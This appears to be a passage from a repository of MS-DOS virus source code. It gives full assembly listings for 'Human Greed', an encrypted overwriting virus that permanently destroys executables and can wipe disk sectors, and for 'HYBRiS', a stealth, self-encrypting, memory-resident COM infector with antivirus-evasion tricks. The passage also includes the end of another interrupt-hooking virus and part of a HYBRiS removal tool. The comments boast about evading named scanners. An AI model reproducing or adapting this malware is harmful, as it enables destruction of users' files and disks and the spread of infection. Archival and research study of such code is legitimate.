cmp al,13
jne GoInt10
mov byte ptr cs:[FireActive],1
GoInt10:
db 0ea
IP_10 dw 0
CS_10 dw 0
Int09:
push ax
in al,60h
cmp al,53h
je IsDel
NotCtrlAltDel:
pop ax
GoInt09:
db 0ea
IP_09 dw 0
CS_09 dw 0
IsDel:
mov ah,2
int 16
and al,1100b
cmp al,0c
jne NotCtrlAltDel
RebootActivation:
mov di,0b800
mov es,di
push cs
pop ds
mov si,offset Fire
mov ax,03
int 10
mov di,550
mov cx,7
BtBigLoop:
push cx
BtDrawFireLine:
mov cx,8
FireLine:
lodsb
mov ah,'Û'
xchg ah,al
stosw
loop FireLine
pop cx
add di,90
loop BtBigLoop
ColdBoot:
db 0ea
db 0,0,0ff,0ff
Int1c:
cmp byte ptr cs:[FireActive],1
jne JmpInt1c
push ax bx cx dx es ds si di
call DrawFire
call ReverseFlame
pop di si ds es dx cx bx ax
JmpInt1c:
db 0ea
IP_1c dw 0
CS_1c dw 0
DrawFire:
push cs
pop ds
mov si,offset Fire
mov di,0a000
mov es,di
xor di,di
mov cx,7
FireLoop:
push cx
mov cx,8
repnz movsb
add di,312d
pop cx
loop FireLoop
ret
ReverseFlame:
push cs cs
pop es ds
mov si,offset Fire
mov cx,7
FlipAll:
push cx
mov cx,4
mov di,si
add di,7
FlipLine:
mov al,byte ptr [si]
xchg al,byte ptr [di]
mov byte ptr [si],al
dec di
inc si
loop FlipLine
pop cx
loop FlipAll
ret
Fire:
db 00,04,00,00,00,00,00,00
db 00,04,0c,04,00,00,00,00
db 00,00,04,0c,04,00,00,00
db 00,00,04,0c,04,04,00,00
db 00,00,04,0e,0c,04,00,00
db 00,04,04,0c,0e,0c,04,00
db 04,04,0c,0e,0f,0c,0c,04
FireActive db 0
InfectionCounter db 0
GoInt13:
db 0ea
endmain:
IP_13 dw ?
CS_13 dw ?
IP_21 dw ?
CS_21 dw ?
CS_24 dw ?
IP_24 dw ?
StealthOn db ?
filename db 50 dup(?)
end_prog:
end start
MSDOS/H-Index/Virus.MSDOS.Unknown.humgreed.asm
+233
View File
@@ -0,0 +1,233 @@
; VirusName : Human Greed
; Origin : Sweden
; Author : The Unforgiven
; Date : 20/12/93
;
; This is a "mutation" of the Infernal Demand virus, written by Metal
; Militia. Even if it's high modified, its ground is still the same.
; This is yet another of this simple overwriting virus, and it's
; nothing really to scream hurray for. This virus will search for
; exe or com files on drive C:, and then overwrite the first 666
; bytes, and therefor permantely destroy the victims. It used the
; "dot-dot" method for changing directory, and when all files are
; infected (overwritten), it will return to the original directory.
; The code is encrypted, thus making it hard to detect. Scan,
; MSAV, CPAV, FindViru, F-prot and TBScan can't find a shit.
; Yes, Tbscan used to find this as the "Infernal" virus, but he
; with his 90% (nice try!) failed again!, how patetic!
;
; If a infected file is being run, it's 50% that it will display
; this stupid "Program to big to fit in memory" message. Then
; if the message is printed on the screen, it'll throw the dice
; once more. If the number are 10 or lower, it'll simple wipe out
; the first sectors by overwrite them on your C: drive. This means
; that for each run, it's 5% that it'll "go-off".
; The "message dump" to a file under c:\ has also been deleted.
; And the new routines wich are included are, encryption,
; get/and restore directory, the randomizer, print faker, and
; of'cos the trash routine too. Hope you enjoy the code!
;===============================================================================
; **** HUMAN GREED ****
;===============================================================================
cseg segment byte public
assume cs:cseg, ds:cseg
org 100h
virus_start:
call encrypt_decrypt
jmp encryption_start
write_virus: ; write the virus to the
call encrypt_decrypt ; files, by overwriting
mov dx,100h ; its beginning
mov ah,40h ;
mov cx,666 ; How sadistical??
int 21h ;
call encrypt_decrypt ;
ret
encryption_value dw 0
encrypt_decrypt:
mov si,offset encryption_start
mov dx,encryption_value
mov cx,(end_of_virus-encryption_start+1)/2
xor_loop:
xor word ptr cs:[si],dx
add si,2
call fool_scan_for_TridenT_virus ; must call this meaningless
loop xor_loop ; routine, otherwise, infected
ret ; files will be reported by
fool_scan_for_TridenT_virus: ; SCAN as the "TridenT" virus.
ret
; just return.
encryption_start:
; get current drive
mov ah,19h ; get current drive
int 21h ;
push ax ;
; move to c:
mov ah,0Eh ;
mov dl,02h ; drive C:
int 21h
; get directory.
mov ah,47h
xor dl,dl
lea si,[bp+infernal+2ch]
int 21h
great:
; find first files (starting .exe's).
mov dx,offset ExeMask ; offset 'EXEMASK'
mov ah,4Eh ; find first
int 21h ; via int21
jnc go_for_it ; jmp if no ERROR
; if no exe's was found, just infect.COM files.
mov dx,offset ComMask ; offset 'COMMASK'
mov ah,4Eh ; find first file
;
again: ;
int 21h ;
jc chdir ;
go_for_it:
mov ax,4300h ; Get attribute of file
mov dx,9eh ; Pointer to name in DTA
int 21h ;
push cx ; Push the attrib to stack
mov ax,4301h ; Set attribute to
xor cx,cx ; normal
int 21h ;
mov ax,3D02h ; Open file
mov dx,9eh ; Pointer to name in DTA
int 21h
jc next ; if error, get next file
xchg ax,bx ; Swap AX & BX
; so the filehandle ends up
; in BX
mov ax,5700h ; Get file date
int 21h ;
push cx ; Save file dates
push dx ;
mov encryption_value,50 ; encryption_value.
call write_virus ; write to file(s).
pop dx ; Get the saved
pop cx ; filedates from the stack
mov ax,5701h ; Set them back to the file
int 21h ;
mov ah,3Eh ; Close the file
int 21h ;
pop cx ; Restore the attribs from
; the stack.
mov dx,9eh ; Pointer to name in DTA
mov ax,4301h ; Set them attributes back
int 21h ;
next:
mov ah,4Fh ; now get the next file
jmp short again ; and do it all over again
chdir:
; change directory to [..] and start infect again.
mov dx,offset dot_dot ; offset 'updir'
mov ah,3bh ; change directory
int 21h
jnc great ; jmp to great if no ERROR
exit:
; Throw the dice..
mov ah,2ch ;
int 21h ;
cmp dl,50
ja real_quit ;
jmp print
; no, quitting time, yet..
print:
; first print message.
mov ah,09h ; Print Fake message.
mov dx,offset sign ;
int 21h ;
get_random:
; Throw of a die..
mov ah,2ch ; Randomize.
int 21h ;
cmp dl,10 ;
ja real_quit ;
jmp trash ; bad bad boy..
trash:
; Trash routine from Nowhere Man of [NuKE], thanks.
cli ;
mov ah,2 ; 2=C:
cwd ;
mov cx,0100h ;
int 026h ;
JMP REAL_QUIT
real_quit:
pop dx ;
mov ah,0Eh ; restore org. drive
int 21h ;
; restore directory
lea dx,[bp+infernal+2ch]
mov ah,3bh
int 21h
; time to quit
mov ah,4ch ; return to prompt
int 21h ; via int21
; some data.
ExeMask db '*.EXE',0 ; tought one, huh?
ComMask db '*.COM',0 ; what is this, hm
dot_dot db '..',0 ; '..'
Note db 'That is not dead '
db 'Which can eternal lie '
db 'Yet with strange aeons '
db 'Even death may die '
db 'LiVe AfteR DeATH...'
db 'Do not waste your time '
db 'Searching For '
db 'those wasted years! '
db '(c) 93/94 The Unforgiven/Immortal Riot '
db 'Thanks to Raver and Metal Militia/IR '
truenote db 'Maria K - Life is limited, love is forever... '
db 'Open to reality, forever in love... '
sign db 'Program too big to fit in memory$' ; fake message!
sadistical db ' ***HUMAN GREED*** The answer of all evil on earth! '
db 'Do You Belive? '
db 'Farwell!....'
end_of_virus:
infernal:
cseg ends
end virus_start
MSDOS/H-Index/Virus.MSDOS.Unknown.hybris.asm
+896
View File
@@ -0,0 +1,896 @@
;===============================================================================
; HYBRiS (c) 1995 The Unforgiven/Immortal Riot
; Brief description:
; TSR COM-infecting, full-stealth virus
; Self-encrypted
; Wasn't scannable when it was released by FP/Tbav/AVP..
; Has quite some collection of grafical payloads (hoping to get AVP attention).
; Multipe interrupt handlers
; Int24h hooking
; Anti-anti-VSAFE-viruses.
; Special thanks to Priest & Stormbringer of Phalcon/Skism
;===============================================================================
.model tiny
.code
org 100h
vir_size equ virus_end-virus_start
virus_start:
jmp entry_point
install:
mov ax,99 ;input = rnd_value in AX
call random ;output = (zero -> rnd_value)
jne get ;if output=0, activate..
mov cs:[activate_flag][bp],1
get:
mov ax,108
call random
jne real_get
start_payload:
call main_payload ;'loop' until ESC is being pressed..
in al,60h
cmp al,1
jne start_payload
jmp short real_get
main_payload: ;remake of a payload I wrote for
mov ax,3 ;IR#6..
int 10h
push ax
push cx
push dx
mov ax,03f00h
mov dx,03c8h
out dx,al
inc dx
mov ax,-1
out dx,al
xchg al,ah
out dx,al
xchg al,ah
out dx,al
mov cx,-1
loop $
dec dx
xor ax,ax
out dx,al
inc dx
out dx,al
out dx,al
out dx,al
pop dx
pop cx
pop ax
ret
real_get:
mov ah,4ah ;Residency routine combined with
mov bx,-1 ;installation check
mov cx,0d00dh
int 21h
cmp ax,cx
jne not_res
jmp already_resident
not_res:
mov ah,4ah ;resize mcb
sub bx,(vir_size+15)/16+1 ;bx=size in para's
int 21h ;es =segment
mov ah,48h ;allocate memory block
mov bx,(vir_size+15)/16 ;bx = size in para's
int 21h ;returns pointer to the beginning
;of the new block allocated
dec ax ;dec ES to get pointer to mcb
mov es,ax ;es=segment
mov word ptr es:[1],8 ;ofs:1 in mcb = owner, 8 = dos
push cs ;cs=ds
pop ds
cld ;clear direction
sub ax,0fh ;substact 15 from ax,
mov es,ax ;thus es:[100h] = start of allocated memory
mov di,100h ;di = 100h (beginning of file)
lea si,[bp+offset virus_start] ;si points to start of virus
mov cx,(vir_size+1)/2 ;copy it resident with words
rep movsw ;until cx = 0 (the whole virus copied)
push es ;es=ds
pop ds
mov ax,3521h ;get interrupt vector from es:bx for
int 21h ;int21h
tb_lup:
cmp word ptr es:[bx],05ebh ;all tbav's utils starts with this code,
jne no_tbdriver ;if its found, get next interrupt handler
cmp byte ptr es:[bx+2],0eah ;and use that as the int21h adress
jne no_tbdriver ;thereby, cutting tbav out from our
les bx,es:[bx+3] ;int21h handler. loop until it's out of
jmp tb_lup ;there. (dunno if this works anymore..)
no_tbdriver:
mov word ptr ds:[Org21ofs],bx ;save segment:offset for int21h
mov word ptr ds:[Org21seg],es ;in a word each
cmp byte ptr cs:[activate_flag][bp],1 ;check if we should activate
jne skip_08_get ;the int8 handler
mov al,08h ;if so, get interrupt-vector
int 21h ;for int8h
mov word ptr ds:[org08ofs],bx
mov word ptr ds:[org08seg],es
skip_08_get:
mov al,09h ;int9
int 21h
mov word ptr ds:[org09ofs],bx
mov word ptr ds:[org09seg],es
mov al,16h ;16h
int 21h
mov word ptr ds:[org16ofs],bx
mov word ptr ds:[org16seg],es
mov dx, offset new_int21h ;set new interrupt handlers
mov ax,2521h ;to ds:dx for int21h
int 21h
cmp byte ptr cs:[activate_flag][bp],1 ;if we didnt get int8, dont
jne skip_08_set ;set a new either!
mov dx, offset new_08h
mov al,08h
int 21h
skip_08_set:
mov dx,offset new_09h ;int9 handler installed
mov al,09h
int 21h
mov dx,offset new_16h ;int 16h handler installed
mov al,16h
int 21h
already_resident:
tbdriver:
mov di,100h
push di ;save di at 100h
push cs ;make cs=ds=es
push cs
pop es
pop ds
lea si,[bp+orgjmp] ;and copy the first 4-init-bytes to
movsw ;the beginning (in memory) so we can
movsw ;return back to the host properly
ret ;jmp di, 100h (since we pushed it above)
new_int21h:
cmp ah,4ah ;installation check part at the beginning
jne chk_vsafe ;no 4ah executed, try next option
cmp bx,-1 ;ah = 4ah, check if bx and cx is set by
jne no_match ;our virus
cmp cx,0d00dh
jne no_match ;no.
mov ax,cx ;move cx into ax
iret ;and do a interrupt return
chk_vsafe:
cmp ax,0fa01h ;a resident anti-virus-virus,
jne chk_exec ;checker
cmp dx,5945h
je go_vsafe
chk_exec:
cmp ax,4b00h ;Since this is a com infector only,
je go_infect ;I don't have to check if al=0, still
;I do it :).
chk_close:
cmp ah,3eh ;check for file-closes
je go_close ; ==> infect
cmp ah,3dh ;file open
je go_disinfect ; ==> disinfect
chk_dir:
cmp ah,11h ;stealth functions on
je go_fcb_stealth ;directory listenings with
cmp ah,12h ;11/12/4e/4fh
je go_fcb_stealth
cmp ah,4eh
je go_handle_stealth
cmp ah,4fh
je go_handle_stealth
no_match:
jmp do_oldint21h ;nothing matched!
go_vsafe: ;indirect-jumps due to 128d bytes jmp's
jmp unload_vsafe ;directives.
go_infect:
jmp infect
go_close:
call setcritical ;if infect on close, install a critical
jmp infect_close ;error handler before
go_disinfect:
call setcritical ;disinfect calls also modifies programs,
jmp disinfect_dsdx ;install the int24h handler before trying
;doing disinfection
go_fcb_stealth: ;11 & 12h calls get's here, to be
jmp hide_dir ;transfered into another routine
;(* Very unstructured programming *)
go_handle_stealth:
jmp hide_dir2
dps db "THIS PROGRAM IS (C) 1995 IMMORTAL RIOT",0 ; no shit!
new_08h:
push ax ;If the int08h installer is
push dx ;installed, the screen background
mov dx,03c8h ;color will fade to white return
xor al,al ;to original color (black), and
out dx,al ;'loop' that procedure all over again
inc dx ;since its activated all the time by
mov al,[cs:bgcol] ;dos internal services. .
out dx,al
out dx,al
out dx,al
inc [cs:bgcol]
pop dx
pop ax
db 0eah
org08ofs dw ?
org08seg dw ?
bgcol db 0
new_09h:
push ax ;preserve register in use
push ds
xor ax,ax
mov ds,ax ;ds=0
in al,60h ;read key
cmp al,53h ;delete?
jnz no_ctrl_alt_del ;no!
test byte ptr ds:[0417h],0ch ;test for alt OR ctrl
je no_ctrl_alt_del ;
jpo no_ctrl_alt_del ;<- Wow. ctrl and alt?
in al,40h ;A small randomizer, this gives us
and al,111111b ;one in 64 I reckon :-).
cmp al,111111b
je no_ctrl_alt_del
push cs
pop ds
mov ax,3 ;set grafic mode and clear screen, too
int 10h
mov ah,2 ;set cursor pos
xor bh,bh
mov dx,0A14h ;10,20d (middle)
int 10h
mov ah,1 ;set cursor
mov cx,2020h ;>nul
int 10h
mov si,offset dps ;point to v_name, of sorts.
all_chars:
loop all_chars
lodsb ;load string by byte from dps
or al,al ;end of string? (al=0)
je cold_boot ;yes, make a cold boot
mov ah,0Eh ;display character from string
int 10h
jmp short all_chars ;put next char to string
cold_boot:
db 0eah ;jmp far ptr
db 00h, 00h, 0ffh,0ffh
no_ctrl_alt_del:
pop ds ;restore registers
pop ax
do_oldint09h:
db 0eah ;and jump to saved vector for int09h
org09ofs dw ?
org09seg dw ?
new_16h:
cmp ax,0fa01h ;check ax for 'vsafe-unload-value'
jne do_oldint16h ;no match in ax.
cmp dx,5945h ;check ds for 'vsafe-unload-value'
jne do_oldint16h ;no match in dx.
jmp unload_vsafe ;program is probably virus-infected.
do_oldint16h:
db 0eah ;program is not trying to unload
org16ofs dw ? ;vsafe..
org16seg dw ?
hide_dir: ;FCB stealth routine
pushf ;simulate a int call with pushf
push cs ;and cs, ip on the stack
call do_oldint21h
or al,al ;was the dir call successfull??
jnz skip_dir ;(i.e. did we find files?)
push ax ;we did find files, save ax/bx/es
push bx ;since we use them in this routine
push es
mov ah,62h ;get active PSP to es:bx
int 21h
mov es,bx
cmp bx,es:[16h] ;PSP belongs to dos?
jnz bad_psp ;no, just stealth on DIR (ie. command.com
;is the owner of the psp)
mov bx,dx ;offset to unopened FCB in BX
mov al,[bx] ;FCB-type in AL..
push ax ;Save it
mov ah,2fh ;Get DTA-area
int 21h
pop ax ;Restore AX
inc al ;check if al=0 or al=ff
jnz no_ext ;If it's not 0, then, it's not extended
add bx,7 ;if it's extended add 7 to skip garbage
no_ext:
mov al,byte ptr es:[bx+17h] ;get seconds field
and al,1fh
xor al,1dh ;is the file infected??
jnz no_stealth ;if not - don't hide size
cmp word ptr es:[bx+1dh],vir_size-3 ;if a file with same seconds
jbe no_stealth ;as an infected is smaller -
sub word ptr es:[bx+1dh],vir_size-3 ;don't hide size
no_stealth:
bad_psp:
pop es ;restore segments/registers
pop bx ;used and return to caller
pop ax
skip_dir:
iret
hide_dir2: ;4e/4fh stealth
pushf
push cs
call do_oldint21h
jc no_files
pushf
push ax
push di
push es
push bx
mov ah,2fh
int 21h
mov di,bx
add di,1eh
cld
mov cx,9 ;scan for the '.' which seperates
mov al,'.' ;the filename from the extension
repne scasb
jne not_inf ;<- Filename without any extension!
cmp word ptr es:[di],'OC'
jne not_inf ;most likely a com
cmp byte ptr es:[di+2],'M'
jne not_inf ;Definitly com
mov ax,es:[bx+16h] ;ask file time
and al,1fh
xor al,1dh ;can the file be infected?
jnz not_inf
cmp word ptr es:[bx+1ah],vir_size ;dont stealth too small
ja hide ;files
cmp word ptr es:[bx+1ch],0 ;>64k? (no-com)
je not_inf ;don't stealth too large files..
hide:
sub es:[bx+1ah],vir_size-3 ;stealth
not_inf:
pop bx
pop es
pop di
pop ax
popf
no_files:
retf 2
infect_close: ;3eh calls arrives at this entry
push es
push bp
push ax
push bx
push cx
push si
push di
push ds
push dx
cmp bx,4 ;don't close null, aux and so
jbe no_close
call check_name ;es:di points to file name
add di,8 ;es:di points to extension
cmp word ptr es:[di],'OC'
jne no_close
cmp byte ptr es:[di+2],'M' ;es:di+2 points to 3rd char in extension
je close_infection
no_close:
pop dx ;no com-file being opened
pop ds
pop di
pop si
pop cx
pop bx
pop ax
pop bp
pop es
jmp do_oldint21h
close_infection:
or byte ptr es:[di-26h],2
mov cs:Closeflag,1 ;mark that 3e-infection = on
mov ax,4200h ;seek tof.
xor cx,cx
cwd
int 21h
jmp short infect_on_close ;infect it
check_name:
push bx
mov ax,1220h ;get job file table for handle at es:di
int 2fh
mov ax,1216h ;get system file table
mov bl,byte ptr es:[di] ;for handle index in bx
int 2fh
pop bx
add di,20h ;es:di+20h points to file name
ret ;return
infect:
push es
push bp
push ax
push bx
push cx
push si
push di
push ds
push dx
call setcritical ;install a critical error handler
mov cs:Closeflag,0 ;make sure closeflag is off
mov ax,4300h ;get attrib
int 21h
push cx ;save attrib onto the stack
mov ax,4301h ;clear attrib
xor cx,cx
int 21h
mov ax,3d00h ;open file in read mode only
int 21h
xchg ax,bx
mov ax,1220h
int 2fh
push bx
mov ax,1216h ;modify
mov bl,byte ptr es:[di]
int 2fh
pop bx
or byte ptr es:[di+2],2 ;to read & write mode in the SFT-entry
infect_on_close: ;entry for infection on 3eh
push cs ;cs=ds
pop ds
mov ax,5700h ;get time/date
int 21h
push cx ;save time/date onto the stack
push dx
mov ah,3fh ;read first four bytes to orgjmp
mov cx,4
mov dx,offset ds:orgjmp
int 21h
cmp word ptr ds:orgjmp,'ZM' ;check if .EXE file
je exe_file
cmp word ptr ds:orgjmp,'MZ'
je exe_file ;if so - don't infect
cmp byte ptr ds:orgjmp+3,'@' ;dont reinfect!
jne lseek_eof
jmp skip_infect
exe_file:
mov cs:exeflag,1 ;mark file as EXE-file, and
jmp short skip_infect ;don't set second value for it!
lseek_eof:
mov ax,4202h ;go end of file, offset in dx:cx
xor cx,cx ;and return file size in dx:ax.
xor dx,dx
int 21h
cmp ax,(0FFFFH-Vir_size) ;dont infect to big or
jae skip_infect ;to small files
cmp ax,(vir_size-100h)
jb skip_infect
add ax,offset entry_point-106h ;calculate entry offset to jmp
mov word ptr ds:newjmp[1],ax ;move it [ax] to newjmp
get_rnd:
mov ah,2ch ;get random number and put enc_val
int 21h
or dl,dl ;dl=0 - get another value!
je get_rnd
mov word ptr ds:enc_val,dx
mov ax,08d00h ;copy entire virus to 8d00h:100h
mov es,ax
mov di,100h
mov si,di
mov cx,(vir_size+1)/2
rep movsw
push es
pop ds
xor bp,bp ;and encrypt it there
call encrypt
mov ah,40h ;write virus to file from position
mov cx,virus_end-install ;08d00h:100h
mov dx,offset install
int 21h
push cs ;cs=ds
pop ds
mov ax,4200h ;go to beginning of file
xor cx,cx
cwd
int 21h
mov ah,40h ;and write a new-jmp-construct
mov cx,4 ;of 4 bytes (4byte=infection marker)
mov dx,offset newjmp
int 21h
skip_infect:
mov ax,5701h ;restore
pop dx ;date
pop cx ;time
cmp byte ptr cs:[exeflag],1 ;exe file?
je skip_sec ;if so - keep the sec_value intact
or cl,00011101b ;and give com-files second value
and cl,11111101b ;29
skip_sec:
int 21h
cmp byte ptr cs:[Closeflag],1 ;check if execute or close infeection,
je dont_close ;if infect on close, dont close file
close_file:
mov ah,3eh ;close the file which were executed
int 21h
pop cx ;get original file-attribs
dont_close:
pop dx ;ds:dx = filename
pop ds
cmp byte ptr cs:[Closeflag],1
je exit_close
mov ax,4301h ;set back saved attribute
int 21h
exit_close:
mov byte ptr cs:closeflag,0
call resetcritical ;set back critical error handler int24h
pop di
pop si
pop cx
pop bx
pop ax
pop bp
pop es ;restore registers in use
do_oldint21h:
O21h:
db 0eah ;jmp far ptr
org21ofs dw ? ;s:o to
org21seg dw ? ;int21h
ret ;call to DOS. . . return!
unload_vsafe:
mov ah,9
mov dx, offset v_name
push ds
push cs
pop ds
int 21h
pop ds
mov ax,4c00h ;exit program infected with an other
int 21h ;virus.
v_name db "[HYBRiS] (c) '95 =TU/IR=",'$'
closeflag db 0
exeflag db 0
activate_flag db 0
disinfect_dsdx:
push ax
push bx
push cx
push dx
push di
push si
push ds
push es ;save all regs/segs...
push ds
pop es ;ds=es
mov cx,64 ;scan for the dot which
mov di,dx ;seperates filename from
mov al,'.' ;extension
cld ;clear direction
repne scasb ;
jne nocom ;<- was no '.' in filename
;(aint likely a comfile)
cmp word ptr ds:[di],'OC'
je smallc
cmp word ptr ds:[di],'oc'
jne nocom
smallc:
cmp byte ptr ds:[di+2],'M'
je open_com
cmp byte ptr ds:[di+2],'m'
je open_com
nocom:
jmp no_com_opened ;no com-file being opened!
open_com:
mov ax,3d02h ;Tbav utils might intercept this
pushf ;action.
push cs
call o21h
xchg ax,bx
push cs ;cs=ds=es
pop ds
push cs
pop es
mov ax,5700h ;get time
int 21h
push cx
push dx
and cl,1fh ;see if seconds = 29
xor cl,1dh
jne close_dis ;its not! (file = not infected)
mov ah,3fh ;read first bytes of the infected
mov cx,4 ;program
mov dx,offset ds:orgjmp
int 21h
cmp byte ptr ds:orgjmp,0e9h ;first byte = jmp?
jne close_dis
cmp byte ptr ds:orgjmp+3,'@' ;fourth byte = '@'?
jne close_dis
mov ax,4202h ;opened file is infected,
mov cx,-1 ;seek the location where we
mov dx,-(virus_end-orgjmp) ;stored the first bytes of the
int 21h ;original program
mov ah,3fh ;read those bytes to orgjmp
mov cx,4
mov dx,offset ds:orgjmp
int 21h
mov ax,4200h ;seek the beginning of file
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;write the original bytes to
mov dx,offset orgjmp ;the top of file
mov cx,4
int 21h
mov ax,4202h ;seek (endoffile-virussize)
mov cx,-1
mov dx,-(virus_end-install)
int 21h
mov ah,40h ;truncate file
xor cx,cx
int 21h
close_dis:
mov ax,5701h ;restore saved
pop dx ;date
pop cx ;and time
int 21h ;
mov ah,3eh ;close the file
pushf
push cs
call o21h
no_com_opened:
pop es
pop ds
pop si
pop di
pop dx
pop cx
pop bx
pop ax
bail_out:
jmp o21h ;and bail out!
random:
push ds
push bx
push cx
push dx
push ax
xor ax,ax
int 1ah
push cs
pop ds
in al,40h
xchg cx,ax
xchg dx,ax
mov bx,offset ran_num
xor ds:[bx],ax
rol word ptr ds:[bx],cl
xor cx,ds:[bx]
rol ax,cl
xor dx,ds:[bx]
ror dx,cl
xor ax,dx
imul dx
xor ax,dx
xor ds:[bx],ax
pop cx
xor dx,dx
inc cx
je random_ret
div cx
xchg ax,dx
random_ret:
pop dx
pop cx
pop bx
pop ds
or ax,ax
ret
SetCritical:
push ax ds
mov ax,9
mov ds,ax
push word ptr ds:[0]
push word ptr ds:[2]
pop word ptr cs:[OldCritical+2]
pop word ptr cs:[OldCritical]
mov word ptr ds:[0],offset CriticalError
push cs
pop word ptr ds:[02]
pop ds
pop ax
ret
ResetCritical:
push ax
push ds
push word ptr cs:[OldCritical]
mov ax,9
push word ptr cs:[OldCritical+2]
mov ds,ax
pop word ptr ds:[2]
pop word ptr ds:[0]
pop ds
pop ax
ret
CriticalError: ;new int24h handler
mov al,3 ;returns no error
iret
OldCritical dd 0 ;dw 0,0
ran_num dw ?
decrypt:
encrypt:
mov ax,word ptr ds:[bp+enc_val] ;enc value in ax
lea di,[bp+install] ;pointer to encryption start
mov cx,(encrypt-install)/2 ;number of words to be encrypted
xor_loopy:
xor word ptr ds:[di],ax
inc di
inc di
loop xor_loopy
ret
enc_val dw 0
entry_point:
call get_bp ;to get the delta offset
;classic old trick..
get_bp:
pop bp
sub bp, offset get_bp
call decrypt ;decrypt virus
jmp install ;jmp to install code
newjmp db 0e9h,00h,00h,'@' ;buffer to calculate a new entry
orgjmp db 0cdh,20h,00,00 ;buffer to save the 4 first bytes
virus_end:
end virus_start
================================================================================
MSDOS/H-Index/Virus.MSDOS.Unknown.hybrisav.asm
+341
View File
@@ -0,0 +1,341 @@
.model tiny
.code
org 100h
start:
jmp short begin_code
copyright db "HYBRiS.1435 Remover. (c) 1995 The Unforgiven/Immortal Riot",0
begin_code:
push dx ; Cool self-check..
push ds
mov ah,9
mov dx,offset intro_msg
int 21h
pop bx
pop dx
cmp bx,dx
jne wrong
mov ah,9
mov dx,offset ok_msg
int 21h
jmp short start_msg1
wrong:
mov ah,9
mov dx,offset wrong_msg
int 21h
int 20h
intro_msg db 'Selfcheck $'
ok_msg db 'OK',13,10,'$'
wrong_msg db 'Failed',13,10,'$'
start_msg1:
mov ah,9 ;print starting msg...
mov dx, offset begin
int 21h
mov ah,0 ;did they agree on the rules?
int 16h
cmp ah,15h ;y/Y
je ok_phile ;yes, they did
mov ah,9 ;print blah..
mov dx, offset not_yes
int 21h
int 20h
not_yes db "User Failure!",13,10,07,36
ok_phile:
mov ah,4ah ;Do a virus installation check. . .
mov bx,0ffffh
mov cx,0d00dh
int 21h
cmp ax,cx ;ax=cx=d00d= the virus is TSR. . .
jne not_res
mov ah,9
mov dx, offset resident
int 21h
int 20h
not_res:
mov ah,2fh ;Get DTA-area to es:bx
int 21h
mov ah,4eh ;find first file matching ds:dx (com)
;with any attribute
next:
mov cx,7
mov dx, offset f_com
int 21h
jc no_com ;we have no more com-files
call main ;got a com-file - search it
mov ah,4fh ;get next com-file
jmp short next
no_com:
terminate: ;no more files!
mov ah,9
mov dx, offset stat1
int 21h
; This nice statistics is made by Blonde. Greetings to him.
mov dx, word ptr [count]
call dec16out
mov ah,9
mov dx, offset stat2
int 21h
mov dx, word ptr [inf]
call dec16out
mov ax,4cffh
int 21h
main:
inc byte ptr [count]
push ax
push bx
push cx
push dx
push di
push si
push es
push es
pop ds
push cs
pop es
mov si,bx
add si,1Eh ;bx = pointer to fname (1eh)
mov di,offset fname_buf
mov cx,0Fh ;cx=15
push cx ;save cx = 15
push di ;save di (fname)
rep movsb ;rep until cx=0
pop di ;restore di
pop cx ;and set cx=15
xor al,al ;zero out al
cld ;Clear direction
repne scasb ;Scan es:[di] for al
push di ;save di
mov al,20h ;
rep stosb ;Store al (fname) to es:[di]
mov byte ptr es:[di],36 ;'$'
pop di
pop es
push cs
pop ds
;mov ah,9 ;print fname
;mov dx,offset fname_buf
;int 21h
mov cx,15 ;with BIOS function due to this procedure
mov si, offset fname_buf ;can be used quite frequently. This is
lup: lodsb ;faster
int 29h ;mov ah,0ch, int 10h
loop lup
mov ax,3d02h ;prepare open in read/write access
mov dx,bx ;bx into dx
add dx,1eh ;bx = pointer to fname
push es ;make es=ds
pop ds
int 21h ;do it!
jnc read_file
mov ah,9 ;uerm? we couldnt open the file
mov dx, offset error_open ;fucking write-protected.. or lame coding
int 21h ;not zoinking f_attribs??
jmp no_inf
read_file:
mov bx,ax ;place file handle in bx
mov ah,3fh ;read first 4 bytes of the file
mov cx,4 ;to a buffer in memory
mov dx, offset read_buf
int 21h
cmp byte ptr ds:[read_buf+3],'@' ;4th byte = @?
jne No_inf
cmp byte ptr ds:[read_buf],0e9h ;1st byte = jmp?
jne no_inf
inc byte ptr [inf]
mov ah,9 ;say that the file is infected
mov dx, offset is_inf
int 21h
mov ah,0 ;wait keypress
int 16h
cmp ah,15h ;y/Y ?
je remove ; => they want to remove it..
jmp no_inf
remove:
mov ax,4202h
mov cx,-1
mov dx,-4
int 21h
mov ah,3fh ;read those bytes to a buffer
mov cx,4
mov dx,offset read_buf
int 21h
mov ax,4200h ;seek the beginning of file
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;write the original bytes to
mov dx,offset read_buf ;the top of file
mov cx,4
int 21h
mov ax,4202h ;seek (filesize-vir_size)
mov cx,-1
mov dx,-1435
int 21h
mov ah,40h ;truncate vir_size..
xor cx,cx
int 21h
mov ah,9 ;Report that the file is clean. . .
mov dx, offset _clean
int 21h
mov byte ptr [clean_f],1
no_inf:
cmp byte ptr [clean_f],1
je skip
mov ah,9 ;say that the file is infected
mov dx, offset is_cle
int 21h
skip:
mov ah,9 ;print linefeed instead of
mov dx, offset linefeed ;mov byte ptr es:[di-1],13
int 21h ;mov byte ptr es:[di],10
;mov byte ptr es:[di+1],36 (see above)
;this is simpler for reporting. . .
mov ah,3eh ;close file
int 21h
pop si ;restore registers in use
pop si
pop dx
pop cx
pop bx
pop ax
ret ;and return to caller
dec16out:
push ds ;This convertation is
push di ;Blonde(tm)
push dx
push cx
push ax
xor cx,cx ;initialize the counter
lea di, buf ;point to a buffer
dec16out1:
push cx ;save the count
mov ax,dx ;AX is the numerator
xor dx,dx ;clear upper half
mov cx,10 ;divisor of 10
div cx ;divide
xchg ax,dx ;get quotient
add al,30h ;increase to ASCII
mov [di],al ;put in byte in ascii-format
inc di ;point to next byte
pop cx ;restore count
inc cx ;count the digit
or dx,dx ;done? (dx=0?)
jnz dec16out1 ;if not zero, loop until dx = 0
dec16out2:
dec di ;decreasment of di
mov dl,[di]
mov ah,2
int 21h ;write dl to screen output
loop dec16out2
pop ax ;restore registers
pop cx
pop dx
pop di
pop ds
ret ;and return
begin:
db "Remover for the HYBRIS virus: This program is free of charge for all users.",13,10
db 'DISCLAIMER: This software is provided "AS IS" without warranty of any kind,',13,10
db "either expressed or implied, including but not limited to the fitness for",13,10
db "any particular purpose. The entire risc as to its quality of performance",13,10
db "is assumed by the user. Agree with those rules [Y/N]",13,10,36
f_com db "*.COM",0 ;COM-spec
buf dw ?
read_buf db ?,?,?,? ;4 buffers to read into
